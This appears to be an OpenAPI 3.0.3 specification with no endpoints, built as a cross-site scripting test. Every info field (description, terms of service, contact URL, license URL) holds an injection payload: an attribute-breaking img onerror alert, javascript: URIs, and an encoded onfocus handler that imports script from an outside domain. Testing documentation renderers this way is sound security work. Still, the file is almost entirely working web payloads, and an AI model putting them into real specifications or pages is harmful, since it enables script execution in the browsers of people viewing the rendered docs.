openapi: 3.0.3
info:
  title: "xss test"
  description: "">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`no1xjohnwick`)//'>"
  termsOfService: "javascript:alert(document.domain)"
  contact:
    name: "xss test"
    email: "xss test"
    url: "javascript:alert(document.domain)"
  license:
    name: "xss test"
    url: "X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>"
  version: "1.0"
paths: {}
